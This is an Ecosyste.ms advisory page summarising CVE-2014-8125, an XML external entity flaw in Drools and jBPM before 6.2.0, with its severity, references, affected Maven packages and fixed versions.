Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS02cXg5LXJmOWctN2ptcs4AAdyR
Improper Input Validation in Drools and jBPM
XML external entity (XXE) vulnerability in Drools and jBPM before 6.2.0 allows remote attackers to read arbitrary files or possibly have other unspecified impact via a crafted BPMN2 file.
Permalink: https://github.com/advisories/GHSA-6qx9-rf9g-7jmrJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cXg5LXJmOWctN2ptcs4AAdyR
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: almost 2 years ago
Updated: over 1 year ago
Identifiers: GHSA-6qx9-rf9g-7jmr, CVE-2014-8125
References:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8125
- https://github.com/droolsjbpm/drools/commit/c48464c3b246e6ef0d4cd0dbf67e83ccd532c6d3
- https://github.com/droolsjbpm/jbpm/commit/713e8073ecf45623cfc5c918c5cbf700203f46e5
- https://bugzilla.redhat.com/show_bug.cgi?id=1169553
- http://rhn.redhat.com/errata/RHSA-2015-0850.html
- http://rhn.redhat.com/errata/RHSA-2015-0851.html
- https://github.com/advisories/GHSA-6qx9-rf9g-7jmr
Blast Radius: 0.0
Affected Packages
maven:org.jbpm:jbpm-bpmn2
Dependent packages: 100Dependent repositories: 501
Downloads:
Affected Version Ranges: <= 6.2.0.CR4
Fixed in: 6.2.0.Final
All affected versions:
All unaffected versions:
maven:org.drools:drools-core
Dependent packages: 419Dependent repositories: 2,495
Downloads:
Affected Version Ranges: <= 6.2.0.CR4
Fixed in: 6.2.0.Final
All affected versions:
All unaffected versions: 5.0.1, 5.1.0, 5.1.1